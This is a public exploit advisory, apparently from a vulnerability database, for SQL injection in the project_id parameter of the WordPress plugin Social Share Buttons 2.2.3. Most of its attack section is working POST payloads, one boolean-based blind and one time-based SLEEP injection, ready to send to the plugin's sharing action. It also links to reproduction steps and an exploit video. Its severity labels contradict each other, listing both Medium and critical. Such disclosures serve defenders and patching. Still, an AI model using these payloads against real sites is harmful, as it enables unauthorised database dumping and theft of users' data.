Social Share Button 2.2.3 SQL Injection

2022.09.16
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

## Title: Social Share Buttons-2.2.3 SQLi ## Author: nu11secur1ty ## Date: 09.16.2022 ## Vendor: https://wordpress.org/ ## Software: https://downloads.wordpress.org/plugin/social-share-buttons-by-supsystic.2.2.3.zip ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3 ## Description: The `project_id` parameter from the Social Share Buttons-2.2.3 system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this system and he can use it for very malicious purposes. WARNING: The attacker can retrieve all-database from this system! NOTE: The users of this system are NOT protected, this SQL vulnerability is CRITICAL! STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: project_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=social-sharing-share&project_id=378116348' or '3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=social-sharing-share&project_id=378116348' or '3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND 'KWbC'='KWbC&network_id=5&post_id= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3) ## Proof and Exploit: [href](https://streamable.com/m9r76w)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top